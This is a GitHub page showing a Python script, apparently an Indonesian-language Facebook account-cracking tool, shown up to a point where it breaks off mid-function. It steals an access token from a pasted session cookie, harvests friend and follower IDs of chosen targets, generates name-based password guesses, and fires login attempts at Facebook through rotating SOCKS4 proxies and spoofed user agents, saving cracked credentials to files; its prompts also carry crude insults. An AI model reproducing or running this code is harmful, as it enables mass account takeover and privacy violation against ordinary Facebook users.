-
Notifications
You must be signed in to change notification settings - Fork 1
/
IFCV2.py
920 lines (908 loc) · 44.5 KB
/
IFCV2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
#-----------------[ IMPORT-MODULE ]-------------------
import requests,bs4,json,os,sys,random,datetime,time,re
import urllib3,rich,base64
from rich.table import Table as me
from rich.console import Console as sol
from bs4 import BeautifulSoup as sop
from concurrent.futures import ThreadPoolExecutor as tred
from rich.console import Group as gp
from rich.panel import Panel as nel
from rich import print as cetak
from rich.markdown import Markdown as mark
from rich.columns import Columns as col
from rich import print as rprint
from rich import pretty
from rich.text import Text as tekz
pretty.install()
CON=sol()
#------------------[ USER-AGENT ]-------------------#
ugen2=[]
ugen=[]
cokbrut=[]
ses=requests.Session()
princp=[]
try:
prox= requests.get('https://api.proxyscrape.com/v2/?request=displayproxies&protocol=socks4&timeout=100000&country=all&ssl=all&anonymity=all').text
open('.prox.txt','w').write(prox)
except Exception as e:
print('[[\x1b[1;92m•\x1b[1;97m] [\x1b[1;96mAlvino_adijaya_xy')
prox=open('.prox.txt','r').read().splitlines()
for xd in range(10000):
a='Mozilla/5.0 (Symbian/3; Series60/'
b=random.randrange(1, 9)
c=random.randrange(1, 9)
d='Nokia'
e=random.randrange(100, 9999)
f='/110.021.0028; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/'
g=random.randrange(1, 9)
h=random.randrange(1, 4)
i=random.randrange(1, 4)
j=random.randrange(1, 4)
k='Mobile Safari/535.1'
uaku=(f'{a}{b}.{c} {d}{e}{f}{g}.{h}.{i}.{j} {k}')
ugen2.append(uaku)
aa='Mozilla/5.0 (Linux; U; Android'
b=random.choice(['6','7','8','9','10','11','12'])
c=' en-us; GT-'
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
h=random.randrange(73,100)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Mobile Safari/537.36'
uaku2=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
ugen.append(uaku2)
for x in range(10):
a='Mozilla/5.0 (SAMSUNG; SAMSUNG-GT-S'
b=random.randrange(100, 9999)
c=random.randrange(100, 9999)
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
h=random.randrange(1, 9)
i='; U; Bada/1.2; en-us) AppleWebKit/533.1 (KHTML, like Gecko) Dolfin/'
j=random.randrange(1, 9)
k=random.randrange(1, 9)
l='Mobile WVGA SMM-MMS/1.2.0 OPN-B'
uak=f'{a}{b}/{c}{d}{e}{f}{g}{h}{i}{j}.{k} {l}'
def uaku():
try:
ua=open('bbnew.txt','r').read().splitlines()
for ub in ua:
ugen.append(ub)
except:
a=requests.get('https://github.com/EC-1709/a/blob/main/bbnew.txt').text
ua=open('.bbnew.txt','w')
aa=re.findall('line">(.*?)<',str(a))
for un in aa:
ua.write(un+'\n')
ua=open('.bbnew.txt','r').read().splitlines()
#------------[ INDICATION ]---------------#
id,id2,loop,ok,cp,akun,oprek,method,lisensiku,taplikasi,tokenku,uid,lisensikuni= [],[],0,0,0,[],[],[],[],[],[],[],[]
cokbrut=[]
pwpluss,pwnya=[],[]
#------------[ WARNA-COLOR ]--------------#
P = '\x1b[1;97m'
M = '\x1b[1;91m'
H = '\x1b[1;92m'
K = '\x1b[1;93m'
B = '\x1b[1;94m'
U = '\x1b[1;95m'
O = '\x1b[1;96m'
N = '\x1b[0m'
Z = "\033[1;30m"
sir = '\033[41m\x1b[1;97m'
x = '\33[m' # DEFAULT
m = '\x1b[1;91m' #RED +
k = '\033[93m' # KUNING +
h = '\x1b[1;92m' # HIJAU +
hh = '\033[32m' # HIJAU -
u = '\033[95m' # UNGU
kk = '\033[33m' # KUNING -
b = '\33[1;96m' # BIRU -
p = '\x1b[0;34m' # BIRU +
asu = random.choice([m,k,h,u,b])
#--------------------[ CONVERTER-BULAN ]--------------#
dic = {'1':'January','2':'February','3':'March','4':'April','5':'May','6':'June','7':'July','8':'August','9':'September','10':'October','11':'November','12':'December'}
dic2 = {'01':'January','02':'February','03':'March','04':'April','05':'May','06':'June','07':'July','08':'August','09':'September','10':'October','11':'November','12':'Devember'}
tgl = datetime.datetime.now().day
bln = dic[(str(datetime.datetime.now().month))]
thn = datetime.datetime.now().year
okc = 'OK-'+str(tgl)+'-'+str(bln)+'-'+str(thn)+'.txt'
cpc = 'CP-'+str(tgl)+'-'+str(bln)+'-'+str(thn)+'.txt'
#------------------[ MACHINE-SUPPORT ]---------------#
def alvino_xy(u):
for e in u + "\n":sys.stdout.write(e);sys.stdout.flush();time.sleep(0.005)
def clear():
os.system('clear')
def back():
login()
#------------------[ LOGO-LAKNAT ]-----------------#
def banner():
print(f'''\t{asu}
___ _ _______ _ ____ ___ _____ ____
|_ _| |/ / ___/ \ | _ \ |_ _| ___/ ___|
| || ' /| |_ / _ \ | |_) | | || |_ | |
| || . \| _/ ___ \| _ < | || _|| |___
|___|_|\_\_|/_/ \_\_| \_\ |___|_| \____|
{m}{k}{h}{sir} AUTHOR : IKFAR IFC {x}{m}{k}{h}{x}''')
#--------------------[ BAGIAN-MASUK ]--------------#
def login():
try:
token = open('.token.txt','r').read()
cok = open('.cok.txt','r').read()
tokenku.append(token)
try:
sy = requests.get('https://graph.facebook.com/me?fields=id,name&access_token='+tokenku[0], cookies={'cookie':cok})
sy2 = json.loads(sy.text)['name']
sy3 = json.loads(sy.text)['id']
menu(sy2,sy3)
except KeyError:
login_lagi334()
except requests.exceptions.ConnectionError:
li = '# PROBLEM INTERNET CONNECTION, CHECK AND TRY AGAIN'
lo = mark(li, style='red')
sol().print(lo, style='cyan')
exit()
except IOError:
login_lagi334()
def login_lagi334():
try:
os.system('clear')
banner()
cetak(nel('\t©©© Saran Ektensi : [green]Cookiedough[white] ©©©'))
asu = random.choice([m,k,h,b,u])
cookie=input(f' [{h}•{x}] Masukkan Cookies :{asu} ')
data = requests.get("https://business.facebook.com/business_locations", headers = {"user-agent": "mozilla/5.0 (linux; android 6.0; mito a990 build/ad198_a_bp307) applewebkit/537.36 (khtml, like gecko) chrome/67.0.3396.81 mobile safari/537.36","referer": "https://www.facebook.com/","host": "business.facebook.com","origin": "https://business.facebook.com","upgrade-insecure-requests" : "1","accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7","cache-control": "max-age=0","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8","content-type":"text/html; charset=utf-8"}, cookies = {"cookie":cookie})
find_token = re.search("(EAAG\w+)", data.text)
ken=open(".token.txt", "w").write(find_token.group(1))
cok=open(".cok.txt", "w").write(cookie)
print(f' {x}[{h}•{x}]{h} TOLONG BACA DULU NGAB!!!!{x} ')
os .system ('xdg-open https://www.facebook.com/100037755396637/posts/pfbid0tT5bzmJwRSRH1sWm9eHhaTQDEmJ9gNFxZyu5W2n9V9up3E29Q31rLhDGn37mRp3l/?app=fbl');#line:52
print(f' {x}[{h}•{x}]{h} LOGIN BERHASIL.........Jalankan Lagi Perintahnya!!!!{x} ');time.sleep(1)
exit()
except Exception as e:
os.system("rm -f .token.txt")
os.system("rm -f .cok.txt")
print(f' %s[%sx%s]%s LOGIN GAGAL.....CEK TUMBAL LUU NGAB !!%s'%(x,k,x,m,x))
exit()
#------------------[ BAGIAN-MENU ]----------------#
def menu(my_name,my_id):
try:
token = open('.token.txt','r').read()
cok = open('.cok.txt','r').read()
except IOError:
print('[×] Cookies Kadaluarsa ')
time.sleep(5)
login_lagi334()
os.system('clear')
banner()
ip = requests.get("https://api.ipify.org").text
cetak(nel('\tSelamat Datang [green]%s[white] Ngentod'%(my_name)))
alvino_xy(f'>> ID KAMU : '+str(my_id))
alvino_xy(f'>> IP KAMU : {ip}')
print('')
print('\x1b[38;5;231m[1]. \x1b[1;96mCrack Publik ')
print('\x1b[38;5;231m[2]. \x1b[1;96mCrack Pengikut ')
print('\x1b[38;5;231m[3]. \x1b[1;96mLaporkan Bug ')
print('\x1b[38;5;231m[4]. \x1b[1;96mCrack File ')
print('\x1b[38;5;231m[5]. \x1b[1;96mHasil Crack ')
print('\x1b[38;5;196m[0]. \x1b[38;5;196mKeluar ')
_____IKFAR__IFC_____ = input('\x1b[38;5;196m=\x1b[38;5;231m=\x1b[38;5;44m=> \x1b[38;5;231mPilih : ')
if _____IKFAR__IFC_____ in ['1']:
dump_massal()
elif _____IKFAR__IFC_____ in ['2']:
dump_follower()
elif _____IKFAR__IFC_____ in ['3']:
laporkan()
elif _____IKFAR__IFC_____ in ['4']:
crack_file()
elif _____IKFAR__IFC_____ in ['5']:
result()
elif _____IKFAR__IFC_____ in ['0']:
os.system('rm -rf .token.txt')
os.system('rm -rf .cookie.txt')
print('>> Sukses Logout+Hapus Kukis ')
exit()
else:
print('╰─> Pilih Yang Bener Asu ')
back()
def error():
print(f'{k}>> Maaf Fitur Ini Masih Di Perbaiki {x}')
time.sleep(4)
back()
#-----------------[ HASIL-CRACK ]-----------------#
def result():
print('╰─> [01] Hasil OK Anda ')
print('╰─> [02] Hasil CP Anda ')
print('╰─> [00] Kembali ')
kz = input('\n>> Pilih : ')
if kz in ['2','02']:
try:vin = os.listdir('CP')
except FileNotFoundError:
print('>> File Tidak Di Temukan ')
time.sleep(3)
back()
if len(vin)==0:
print('>> Anda Tidak Memiliki Hasil CP ')
time.sleep(2)
back()
else:
cih = 0
lol = {}
for isi in vin:
try:hem = open('CP/'+isi,'r').readlines()
except:continue
cih+=1
if cih<100:
nom = '0'+str(cih)
lol.update({str(cih):str(isi)})
lol.update({nom:str(isi)})
print('['+nom+'] '+isi+' [ '+str(len(hem))+' Account ]'+x)
else:
lol.update({str(cih):str(isi)})
print('['+str(cih)+'] '+isi+' [ '+str(len(hem))+' Account ]'+x)
geeh = input('\n>> Pilih : ')
try:geh = lol[geeh]
except KeyError:
print('>> Pilih Yang Bener Kontol ')
exit()
try:lin = open('CP/'+geh,'r').read().splitlines()
except:
print('>> File Tidak Di Temukan ')
time.sleep(2)
back()
nocp=0
for cpku in range(len(lin)):
cpkuni=lin[nocp].split('|')
cpkuh=f'# ID : {cpkuni[0]} PASSWORD : {cpkuni[1]}'
sol().print(mark(cpkuh,style="yellow"))
nocp +=1
input('[ Klik Enter ]')
back()
elif kz in ['1','01']:
try:vin = os.listdir('OK')
except FileNotFoundError:
print('>> File Tidak Di Temukan ')
time.sleep(2)
back()
if len(vin)==0:
print('>> Anda Tidak Mempunyai File OK ')
time.sleep(2)
back()
else:
cih = 0
lol = {}
for isi in vin:
try:hem = open('OK/'+isi,'r').readlines()
except:continue
cih+=1
if cih<100:
nom = '0'+str(cih)
lol.update({str(cih):str(isi)})
lol.update({nom:str(isi)})
print('['+nom+'] '+isi+' [ '+str(len(hem))+' Account ]'+x)
else:
lol.update({str(cih):str(isi)})
print('['+str(cih)+'] '+isi+' [ '+str(len(hem))+' Account ]'+x)
geeh = input('\n>> Pilih : ')
try:geh = lol[geeh]
except KeyError:
print('>> Pilih Yang Bener Kontol ')
exit()
try:lin = open('OK/'+geh,'r').read().splitlines()
except:
print('>> File Tidak Di Temukan ')
time.sleep(2)
back()
nocp=0
for cpku in range(len(lin)):
cpkuni=lin[nocp].split('|')
cpkuh=f'# ID : {cpkuni[0]} PASSWORD : {cpkuni[1]}'
sol().print(mark(cpkuh,style="green"))
print(f'{hh}UserAgent : {x}{cpkuni[2]}')
nocp +=1
input('[ Klik Enter ]')
back()
elif kz in ['0','00']:
back()
else:
print('>> Pilih Yang Bener Kontol ')
back()
#-------------------[ CRACK-PUBLIK ]----------------#
def dump_massal():
try:
token = open('.token.txt','r').read()
cok = open('.cok.txt','r').read()
except IOError:
exit()
try:
print(f'╰─> {x}[{h}•{x}]{h} SAVE WHATSAPP GUA DULU NGAB!!!!{x} ')
os .system ('xdg-open https://wa.me/6283899216451?text=Save+Wa+Gua+Bang,+Btw+Izin+Pake+Scnya');#line:52
jum = int(input('➣ Mau Berapa Target Cok ? : '))
except ValueError:
print('[➣] Masukkan Angka Anjing, Malah Huruff ')
exit()
if jum<1 or jum>100:
print('[➣] Gagal Dump Id ')
exit()
ses=requests.Session()
yz = 0
for met in range(jum):
yz+=1
kl = input('╰─> Masukkan Id Yang Ke '+str(yz)+' : ')
uid.append(kl)
for userr in uid:
try:
col = ses.get('https://graph.facebook.com/v2.0/'+userr+'?fields=friends.limit(5000)&access_token='+tokenku[0], cookies = {'cookies':cok}).json()
for mi in col['friends']['data']:
try:
iso = (mi['id']+'|'+mi['name'])
if iso in id:pass
else:id.append(iso)
except:continue
except (KeyError,IOError):
pass
except requests.exceptions.ConnectionError:
print('➣ Sinyal Loh Kek Kontoll ')
exit()
try:
print('')
print(f'➣ Total Id Yang Terkumpul= {h}'+str(len(id)))
setting()
except requests.exceptions.ConnectionError:
print(f'{x}')
print('➣ Sinyal Lo kek Kontol ')
back()
except (KeyError,IOError):
print(f'>>{k} Pertemanan Tidak Public {x}')
time.sleep(3)
back()
#-------------------[ CRACK-PENGIKUT ]----------------#
def dump_pengikut():
try:
token = open('.token.txt','r').read()
cok = open('.cok.txt','r').read()
except IOError:
exit()
print('>> Ketik ( me ) Jika Ingin Crack Follower Sendiri ')
pil = input('➣ Masukkan Id Target : ')
try:
koh2 = requests.get('https://graph.facebook.com/'+pil+'?fields=subscribers.limit(99999)&access_token='+tokenku[0],cookies={'cookie': cok}).json()
for pi in koh2['subscribers']['data']:
try:id.append(pi['id']+'|'+pi['name'])
except:continue
print(f'➣ Total Id :{h} '+str(len(id)))
setting()
except requests.exceptions.ConnectionError:
print('➣ Koneksi Internet Bermasalah ')
exit()
except (KeyError,IOError):
print('➣ Gagal Mengambil Target ')
exit()
#------------------[ CRACK-GRUP ]-----------------#
def laporkan():
print (f"╰─>{H}[{P}!{H}]{P} Anda Akan Diarahkan Ke Whatsapp...");time .sleep (3 );
os .system ('xdg-open https://wa.me/6283899216451?text=Bang+Farz+Scnya+Ada+Yang+Error');back ()#line:52
back()
#-------------[ CRACK-FROM-FILE ]------------------#
def crack_file():
try:vin = os.listdir('DUMP')
except FileNotFoundError:
print('>> File Tidak Ditemukan ')
time.sleep(2)
back()
if len(vin)==0:
print('>> Kamu Tidak Memiliki File Dump ')
time.sleep(2)
back()
else:
cih = 0
lol = {}
for isi in vin:
try:hem = open('DUMP/'+isi,'r').readlines()
except:continue
cih+=1
if cih<100:
nom = ''+str(cih)
lol.update({str(cih):str(isi)})
lol.update({nom:str(isi)})
print(f'>> %s. %s ({h} %s{x} id )'%(nom,isi,len(hem)))
else:
lol.update({str(cih):str(isi)})
print('['+str(cih)+'] '+isi+' [ '+str(len(hem))+' Account ]'+x)
print('>> %s. %s ({h} %s {x}id) '%(cih,isi,len(hem)))
geeh = input('\n>> Pilih : ')
try:geh = lol[geeh]
except KeyError:
print(f'{k}>> Pilih Yang Bener Kontol {x}')
time.sleep(3)
back()
try:lin = open('DUMP/'+geh,'r').read().splitlines()
except:
print('>> File Tidak Ditemukan, Coba Lagi Nanti ')
time.sleep(2)
back()
for xid in lin:
id.append(xid)
setting()
#-------------[ PENGATURAN-IDZ ]---------------#
def setting():
print(f'{x}╰─> 1. Akun Old ({K}Ga Terlalu Recommended{K}{x}){x}')
print(f'╰─> 2. Akun New ({H}Recommended{H}{x}){x}')
print(f'╰─> 3. Akun Random ({H}Recommended{H}{x}){x}')
print('')
hu = input('➣ Pilih : ')
if hu in ['1','01']:
for tua in sorted(id):
id2.append(tua)
elif hu in ['2','02']:
muda=[]
for bacot in sorted(id):
muda.append(bacot)
bcm=len(muda)
bcmi=(bcm-1)
for xmud in range(bcm):
id2.append(muda[bcmi])
bcmi -=1
elif hu in ['3','03']:
for bacot in id:
xx = random.randint(0,len(id2))
id2.insert(xx,bacot)
else:
print('➣ Pilih Yang Bener Kontooll ')
exit()
cetak(nel('[cyan][white]╰─> 1. Mobile [Recommended]'))
cetak(nel('[cyan][white]╰─> 2. Mbasic [Recommended] '))
cetak(nel('[cyan][white]╰─> 3. Touch '))
cetak(nel('[cyan][white]╰─> 4. Mtouch '))
print('')
hc = input('➣ Pilih : ')
if hc in ['1','01']:
method.append('mobile')
elif hc in ['4','04']:
method.append('free')
elif hc in ['3','03']:
method.append('touch')
elif hc in ['2','02']:
method.append('mbasic')
else:
method.append('mobile')
print('')
#guw = '# LIHATKAN APLIKASI TERKAIT {y/t}'
#sol().print(mark(guw, style='red'))
#taplikasi.append('y')
#else:
#taplikasi.append('t')
guw = '# TAMBAHKAN PASSWORD MANUAL {y/t}'
sol().print(mark(guw, style='white'))
pwplus = input(N+'['+M+'➣'+N+'] Ketik Pilihan : ')
if pwplus in ['y','Y']:
pwpluss.append('ya')
cetak(nel('[[cyan]•[white]] Masukkan Katasandi Tambahan Minimal 6 Karakter\n[[cyan]•[white]] Contoh :[green] sayang,bagong,anjing,123456[white] '))
pwku=input(N+'['+M+'➣'+N+'] Masukkan Password Tambahan: ')
pwkuh=pwku.split(',')
for xpw in pwkuh:
pwnya.append(xpw)
else:
pwpluss.append('no')
passwrd()
#-------------------[ BAGIAN-WORDLIST ]------------#
def passwrd():
cetak(nel('[[cyan]•[white]]>>>>> {I}•{F}•{C}•{🔥} \x1b[38;5;231mProses Crack \x1b[38;5;46mSabar Anjing {I}•{F}•{C}•{🔥} <<<<< '))
print('')
print(f'╰─> Hasil {h}OK{x} Tersimpan Di : {h}OK/%s {x}'%(okc))
print(f'╰─> Hasil {k}CP{x} Tersimpan Di : {k}CP/%s {x}'%(cpc))
print(f'[✈] ON/OFF Mode Pesawat Setiap {m}5{x} Menit\n')
with tred(max_workers=30) as pool:
for yuzong in id2:
idf,nmf = yuzong.split('|')[0],yuzong.split('|')[1].lower()
frs = nmf.split(' ')[0]
pwv = []
if len(nmf)<6:
if len(frs)<3:
pass
else:
pwv.append(frs+'123')
pwv.append(frs+'321')
pwv.append(frs+'1234')
pwv.append(frs+'12345')
else:
if len(frs)<3:
pwv.append(nmf)
else:
pwv.append(nmf)
pwv.append(frs+'123')
pwv.append(frs+'321')
pwv.append(frs+'1234')
pwv.append(frs+'12345')
if 'ya' in pwpluss:
for xpwd in pwnya:
pwv.append(xpwd)
else:pass
if 'mobile' in method:
pool.submit(crack,idf,pwv,nmf)
elif 'free' in method:
pool.submit(crackfree,idf,pwv)
elif 'touch' in method:
pool.submit(cracktouch,idf,pwv)
elif 'mbasic' in method:
pool.submit(crackmbasic,idf,pwv)
else:
pool.submit(crackmbasic,idf,pwv)
print('')
print(N+'['+M+'➣'+N+']>>> CRACK SELESAI NGAB, JANGAN LUPA BERSYUKUR <<< ')
print(f'[{b}•{x}]{h} OK : {h}%s '%(ok))
print(f'{x}[{b}•{x}]{k} CP : {k}%s{x} '%(cp))
print('')
print('>> Lanjut Crack Kembali ( Y/t ) ? ')
woi = input('>> Pilih : ')
if woi in ['y','Y']:
back()
else:
print(f'\t{x}>>{k} Good Bye Dadaahh{x} << ')
time.sleep(2)
exit()
#--------------------[ METODE-B-API ]-----------------#
def crack(idf,pwv,nmf):
global loop,ok,cp
bo = random.choice([m,k,h,b,u,x])
sys.stdout.write(f"\r[✨SABAR✨] {P}[{b}{loop}{P}/{u}{len(id)}{P}]—{P}[{H}{ok}{P}]—{P}[{k}{cp}{x}]—[{bo}{'{:.0%}'.format(loop/float(len(id)))}{P}] "),
sys.stdout.flush()
ua = random.choice(ugen)
ua2 = random.choice(ugen2)
ses = requests.Session()
for pw in pwv:
try:
nip=random.choice(prox)
proxs= {'http': 'socks4://'+nip}
ses.headers.update({'Host': 'm.facebook.com','cache-control': 'max-age=0','sec-ch-ua-mobile': '?1','upgrade-insecure-requests': '1','user-agent': ua,'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','sec-fetch-site': 'same-origin','sec-fetch-mode': 'cors','sec-fetch-dest': 'empty','accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'})
p = ses.get('https://m.facebook.com/login/device-based/password/?uid='+idf+'&flow=login_no_pin&next=https%3A%2F%2Fm.facebook.com%2Fv2.3%2Fdialog%2Foauth%3Fapp_id%3D124024574287414%26cbt%3D1651658200978%26e2e%3D%257B%2522init%2522%253A1651658200978%257D%26sso%3Dchrome_custom_tab%26scope%3Demail%26state%3D%257B%25220_auth_logger_id%2522%253A%252268f15bae-23f8-463c-8660-5cf1226d97f6%2522%252C%25227_challenge%2522%253A%2522dahj28hqtietmhrgprpp%2522%252C%25223_method%2522%253A%2522custom_tab%2522%257D%26redirect_uri%3Dfbconnect%253A%252F%252Fcct.com.instathunder.app%26response_type%3Dtoken%252Csigned_request%252Cgraph_domain%252Cgranted_scopes%26return_scopes%3Dtrue%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D68f15bae-23f8-463c-8660-5cf1226d97f6%26tp%3Dunspecified&cancel_url=fbconnect%3A%2F%2Fcct.com.instathunder.app%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%25220_auth_logger_id%2522%253A%252268f15bae-23f8-463c-8660-5cf1226d97f6%2522%252C%25227_challenge%2522%253A%2522dahj28hqtietmhrgprpp%2522%252C%25223_method%2522%253A%2522custom_tab%2522%257D&display=touch&locale=id_ID&pl_dbl=0&refsrc=deprecated&_rdr')
dataa ={"lsd":re.search('name="lsd" value="(.*?)"', str(p.text)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p.text)).group(1),"uid":idf,"next":"https://m.facebook.com/v2.3/dialog/oauth?app_id=124024574287414&cbt=1651658200978&e2e=%7B%22init%22%3A1651658200978%7D&sso=chrome_custom_tab&scope=email&state=%7B%220_auth_logger_id%22%3A%2268f15bae-23f8-463c-8660-5cf1226d97f6%22%2C%227_challenge%22%3A%22dahj28hqtietmhrgprpp%22%2C%223_method%22%3A%22custom_tab%22%7D&redirect_uri=fbconnect%3A%2F%2Fcct.com.instathunder.app&response_type=token%2Csigned_request%2Cgraph_domain%2Cgranted_scopes&return_scopes=true&ret=login&fbapp_pres=0&logger_id=68f15bae-23f8-463c-8660-5cf1226d97f6&tp=unspecified","flow":"login_no_pin","pass":pw,}
koki = (";").join([ "%s=%s" % (key, value) for key, value in p.cookies.get_dict().items() ])
koki+=' m_pixel_ratio=2.625; wd=412x756'
heade={'Host': 'm.facebook.com','cache-control': 'max-age=0','sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="98"','sec-ch-ua-mobile': '?1','sec-ch-ua-platform': '"Android"','upgrade-insecure-requests': '1','origin': 'https://m.facebook.com','content-type': 'application/x-www-form-urlencoded','user-agent': ua,'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','x-requested-with': 'XMLHttpRequest','sec-fetch-site': 'same-origin','sec-fetch-mode': 'cors','sec-fetch-dest': 'empty','referer': 'https://m.facebook.com/login/device-based/password/?uid='+idf+'&flow=login_no_pin&next=https%3A%2F%2Fm.facebook.com%2Fv2.3%2Fdialog%2Foauth%3Fapp_id%3D124024574287414%26cbt%3D1651658200978%26e2e%3D%257B%2522init%2522%253A1651658200978%257D%26sso%3Dchrome_custom_tab%26scope%3Demail%26state%3D%257B%25220_auth_logger_id%2522%253A%252268f15bae-23f8-463c-8660-5cf1226d97f6%2522%252C%25227_challenge%2522%253A%2522dahj28hqtietmhrgprpp%2522%252C%25223_method%2522%253A%2522custom_tab%2522%257D%26redirect_uri%3Dfbconnect%253A%252F%252Fcct.com.instathunder.app%26response_type%3Dtoken%252Csigned_request%252Cgraph_domain%252Cgranted_scopes%26return_scopes%3Dtrue%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D68f15bae-23f8-463c-8660-5cf1226d97f6%26tp%3Dunspecified&cancel_url=fbconnect%3A%2F%2Fcct.com.instathunder.app%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%25220_auth_logger_id%2522%253A%252268f15bae-23f8-463c-8660-5cf1226d97f6%2522%252C%25227_challenge%2522%253A%2522dahj28hqtietmhrgprpp%2522%252C%25223_method%2522%253A%2522custom_tab%2522%257D&display=touch&locale=id_ID&pl_dbl=0&refsrc=deprecated&_rdr','accept-encoding': 'gzip, deflate, br','accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
po = ses.post('https://m.facebook.com/login/device-based/validate-password/?shbl=0&locale2=id_ID',data=dataa,cookies={'cookie': koki},headers=heade,allow_redirects=False,proxies=proxs)
if "checkpoint" in po.cookies.get_dict().keys():
